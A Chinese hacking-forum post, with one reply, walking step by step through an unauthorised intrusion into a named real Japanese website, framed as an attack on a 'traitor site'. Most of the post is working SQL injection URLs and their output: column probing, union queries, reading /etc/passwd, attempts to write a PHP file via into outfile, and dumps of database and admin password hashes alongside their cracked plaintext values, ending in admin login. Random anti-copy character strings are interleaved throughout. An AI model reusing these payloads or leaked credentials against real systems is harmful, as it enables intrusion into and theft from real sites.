找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3817|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试
3 P  U, \' @* u) v& D2 w3 s
) o' I1 e6 l# Z+ O  H  Q0 O) L# B
0x01. 检测 www.zuaa.jp 收集数据- |/ R- i2 Y& o+ L, F5 b
% E9 Y2 l0 k2 |
; p4 v0 v# X: W* |2 C5 |
whatweb
  j/ v+ ]& K4 B( A6 v' p, ^$ a( I2 P% j- ~7 i6 U0 L1 g5 z

; [8 n% K8 F9 O+ s: s& P利用NMAP扫描
7 _: k( v; `' R8 ]' f- J1 H# ?3 y% E
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持, C3 U. u4 }& q8 j
0x02.找注入点
; z6 J5 `' T/ I# {- z$ ]找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
& t8 p. J" f$ [) ?" y1 ?* e) y# |2 S2 b& q2 \  w% l# m
1 h6 a- w# R3 n: f0 G
0x03.order by) v4 ?9 J( w# c# H  K
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
% A" i. L/ P3 P: L% s
8 S( [; H" E+ U. W/ Morder by 28报错,order by 27正常
" j5 Y2 R/ l% R1 d7 D" z5 C; g( t  j
) r+ i8 A3 T) T% r0 ?0x04.   union手动查询
! h5 h4 C6 {! D! W- _9 Ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 $ V9 l6 R2 U) l* j. a' C' W
添加到 27 时正常显示
- H. ^) o; P* |2 D* Z6 b3 ^; N! g: i0 ~* ]( b2 i
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持/ ^% F  f9 ~+ ~6 E3 k  ]! m
' m! d( J* |# r" E
0x05. info:7 r! u- p5 N4 |2 h) t* a  I7 l9 z
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
  S4 M1 F5 W8 a, j/ ^7 p
" P1 _' ?, k( [1 m+ A, b; E8 w$ luser:            root@localhost
2 r- }7 Z, U# O9 V2 _- y: rdatabase:    openpne3 e  L9 n6 U. h' }+ h$ H# |' O$ {
version:      4.1.22; T* H2 l( ]7 K+ S; b- e" a: n
os:             portbld-freebsd5.4
3 K5 A2 `- e# U+ n: M
: F4 n2 L! l, Z; R& D8 W0x06. root用户
/ i0 D6 n. r7 k. h  ?利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)3 h5 m/ r: `/ g7 ]
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ' K2 ?$ Z8 I4 ~+ L
/ H% p4 P1 R! p( E! @) L2 f8 _
通过工具转换
( R% N9 {3 h% K
) ^- X# {9 F/ v中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持% }0 {2 A9 d3 @% V1 h
( ^& @& @) n3 L/ C& q# w
0x07. 利用 into outfile
& T; [6 I" O( `& e全部都失败
! a$ A+ ]* ]3 m( z- m8 L3 I9 Bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
5 O. g5 N8 z5 V! j/ N
2 J+ a  M/ V$ |  N  X  thttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php   S/ Q: x8 P" G* T. S. y
+ m1 l8 b, L; F  R5 X
页面显示“MDB2 Error:syntax error”
; F& t3 s) X$ [4 F2 z% R! t1 ?+ H# A8 @. ^1 ?3 F
0x08. 利用 mysql 4.11 i  G! D1 a) A. m/ ?: V
猜常规表名,字段未果 工具 sqlmap1 j/ l+ p7 \' `- o4 _; v6 T
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
" ~8 d  ~; @- Z  w4 }2 ^4 J% T/ R" t. r0 E- X' l
7 G% M, y6 v, P7 f- h
) `3 j4 Z- c2 Q4 ?  `7 |; a
0x09. 查找后台' |6 I8 U* X9 K% c3 U. g! }
利用 现有的各种 后台工具尝试都不行
$ ]" A( E6 r( j( E$ S) n0 n8 M  p! @. K, l5 Y& Q" m
0x10.  MySL外联方法
! u/ J$ K3 n' H& `从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行' Q; y: I9 K. J( n+ s, Z$ ]
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
7 t% B& |6 D* E2 J  yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user# l  V5 o, {( R7 [1 O7 C

) n) d, C! N0 w; `3 z这个可以在 www.cmd5.com 解密
; P3 W. w; L; }! B/ \6 T/ Zroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa20096 i) @- B7 F( `( Z9 s
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad976 d$ y. a3 C: T5 C
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
- m7 |: r: t  ~% {9 ?3 C4 azuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
; h; X2 V5 t2 m+ Y8 H2 d5 F工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
" Q3 {0 L; B4 _: o& x- }1 S% B6 o# x

7 F; [" H( Q3 n5 i7 D  r0x11. 网站突破
+ G  U2 M* U( n' N6 G1 @发现网站的源程序 openpne, google 下载 openpne 源码9 {8 A6 F/ K- W7 ^$ D" S/ B

8 D) {, J* |- _; g  [( R& F* ^% r: p% U( D+ k8 W
0x12. 默认信息利用! C" V6 W6 j0 b$ y9 [0 C  z
http://sns.zuaa.jp/?m=admin&a=page_login9 |0 U5 [( `9 z& t* `1 S" ^
) s. d8 g) P+ j) X* y! H
表名 (c_admin_user) ,字段名(username,password)# O/ G. C6 N4 P7 r; t3 a$ u
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user* [9 g# i; D7 ?+ U- U# t

* a# ^; e- W  d% e) }解密  o7 G" R. Z- e' \$ G: z8 }# G) h1 U
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
( C! d# o5 X( ^$ R) l6 K' Y% G. Qzuaajp:c0923ec5857796a393da99905008c176,          zju18974 X2 U) d0 q& O0 \* t
3 h; S+ m7 w3 i* t# `- i8 v
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持; q8 ?/ k, c5 Q1 F% B! U3 o- w& S/ W
9 @8 w9 O$ `$ S) t! b
0x13. 登录后台. d( f$ E7 g2 V$ \

0 V* w& E* K0 I" P+ o. g1 a1 s8 f1 _6 m- @% X4 f% L9 V! x

" D" R! M1 V. U  [" z2 f4 T0x14. 小结
* O! \1 `& m' r8 D利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。- P4 o& {" ?9 K4 Q; D3 V/ u0 p" c
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点4 N! d0 f5 [, @. T" S4 `' X0 x5 P/ p
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain4 X+ T! B2 G# d' t! p8 W
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
; s# v0 e. ?+ t7 v0 Z1 S6 R( E  ]5 U: e. h4 t
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!9 V% I) r1 X; W0 q% z0 w

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表